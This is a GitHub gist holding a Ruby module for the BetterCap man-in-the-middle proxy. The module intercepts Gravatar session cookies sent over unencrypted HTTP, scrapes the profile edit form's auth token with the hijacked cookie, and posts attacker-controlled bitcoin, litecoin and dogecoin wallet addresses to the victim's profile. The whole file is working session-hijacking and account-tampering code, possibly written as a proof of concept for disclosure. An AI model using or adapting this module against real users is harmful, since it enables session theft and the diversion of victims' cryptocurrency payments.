Skip to content

Instantly share code, notes, and snippets.

@groovecoder
Created February 12, 2018 20:25
Show Gist options
  • Save groovecoder/cd66b8b9527917120787813352099448 to your computer and use it in GitHub Desktop.
Save groovecoder/cd66b8b9527917120787813352099448 to your computer and use it in GitHub Desktop.
=begin
BETTERCAP
Author : Luke "groovecoder" Crouch
Email : luke.crouch@gmail.com
Blog : http://groovecoder.com
This project is released under the GPL 3 license.
=end
require "nokogiri"
class UpdateGravatarWallets < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'UpdateGravatarWallets',
'Description' => "Intercepts gravatar.com session cookies and uses them to update the victim's gravatar profile's crypto-currency wallet addresses.",
'Version' => '1.0.0',
'Author' => "Luke 'groovecoder' Crouch",
'License' => 'GPL3'
)
def on_request( request, response )
# Hack insecure requests to gravatar.com
if request.host == "www.gravatar.com" and response.content_type =~ /^image\/png/
BetterCap::Logger.info "Hacking http://#{request.host}"
cookie = request.headers['Cookie']
auth = ""
# get the auth value for the form-profile
uri = URI('https://en.gravatar.com/profiles/edit/#currency-services')
Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
request = Net::HTTP::Get.new uri
request['Cookie'] = cookie
response = http.request request
body = response.read_body
doc = Nokogiri::HTML(body)
input = doc.css('input[name="auth"]').first
auth = input['value']
end
# POST new wallet addresses using the hijacked cookie and the auth value
Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
request = Net::HTTP::Post.new uri
request['Cookie'] = cookie
request.set_form_data('auth' => auth,
'panel' => 'currency-services',
'currency.bitcoin' => 'attacker-bitcoin-address',
'currency.litecoin' => 'attacker-litecoin-address',
'currency.dogecoin' => 'attacker-dogecoin-address',
'save' => 'Save Currencies')
response = http.request request
end
end
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment